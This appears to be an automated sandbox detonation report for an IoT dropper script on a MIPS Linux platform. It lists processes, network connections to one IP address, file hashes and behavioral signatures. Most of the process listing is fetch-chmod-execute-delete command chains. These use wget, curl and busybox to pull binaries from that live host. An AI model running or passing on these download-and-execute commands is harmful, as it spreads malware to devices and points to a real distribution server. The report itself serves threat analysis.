/usr/bin/curl
[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/chmod
[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/rm
[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/wget
[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/chmod
[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/rm
[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/wget
[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/chmod
[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/rm
[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/wget
[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/chmod
[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/rm
[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/wget
[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/chmod
[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/rm
[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/wget
[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/chmod
[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/rm
[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/wget
[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/chmod
[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/rm
[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/wget
[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/chmod
[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/rm
[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/wget
[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/chmod
[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/rm
[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/chmod
[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/rm
[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/usr/bin/wget
[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/chmod
[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/rm
[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/wget
[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/chmod
[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/rm
[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/wget
[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/chmod
[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/rm
[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/wget
[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/chmod
[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/rm
[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-20 03:36
Reported
2024-11-20 03:39
Platform
debian9-mipsel-20240611-en
Max time kernel
84s
Max time network
86s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | N/A |
| N/A | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | N/A |
| N/A | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | N/A |
| N/A | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | N/A |
| N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | N/A |
| N/A | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | N/A |
| N/A | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | N/A |
| N/A | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | N/A |
| N/A | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | N/A |
| N/A | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | N/A |
| N/A | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | N/A |
| N/A | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | N/A |
| N/A | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | N/A |
| N/A | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | N/A |
| N/A | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | N/A |
| N/A | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | N/A |
| N/A | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | N/A |
| N/A | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | N/A |
| N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | N/A |
| N/A | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | N/A |
| N/A | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | N/A |
| N/A | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | N/A |
| N/A | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | N/A |
| N/A | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | N/A |
| N/A | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | N/A |
| N/A | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /usr/bin/curl | N/A |
Processes
/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/chmod
[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/rm
[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/wget
[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/chmod
[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/rm
